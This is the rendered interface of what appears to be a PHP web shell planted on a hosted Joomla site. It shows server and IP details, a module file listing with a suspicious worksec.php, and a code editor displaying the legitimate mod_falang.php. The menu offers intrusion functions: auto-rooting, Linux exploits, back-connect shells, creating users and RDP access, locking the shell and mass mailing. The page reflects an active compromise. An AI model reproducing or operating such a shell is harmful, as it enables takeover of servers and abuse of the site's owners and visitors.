Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
ptitsanes /
modules /
mod_falang /
[ HOME SHELL ]
Name
Size
Permission
Action
tmpl
[ DIR ]
drwxr-xr-x
.htaccess
420
B
-rw-r--r--
admin.php
5.24
KB
-rw-r--r--
helper.php
24.97
KB
-rw-r--r--
index.html
45
B
-rw----r--
index.php
14
KB
-rw-r--r--
mod_falang.php
867
B
-rw-r--r--
mod_falang.xml
6.05
KB
-rw----r--
worksec.php
1.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mod_falang.php
<?php /** * @package Falang for Joomla! * @author Stéphane Bouey <stephane.bouey@faboba.com> - http://www.faboba.com * @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html * @copyright Copyright (C) 2010-2017. Faboba.com All rights reserved. */ // No direct access to this file defined('_JEXEC') or die; // Include the syndicate functions only once require_once(dirname(__FILE__)) . '/helper.php'; if (!modFaLangHelper::isFalangDriverActive()){ echo JText::_("MOD_FALANG_PLUGIN_DRIVER_NOT_ENABLED"); return; } $headerText = JString::trim($params->get('header_text')); $footerText = JString::trim($params->get('footer_text')); $list = modFaLangHelper::getList($params); $moduleclass_sfx = htmlspecialchars($params->get('moduleclass_sfx')); require JModuleHelper::getLayoutPath('mod_falang', $params->get('layout', 'default'));
Close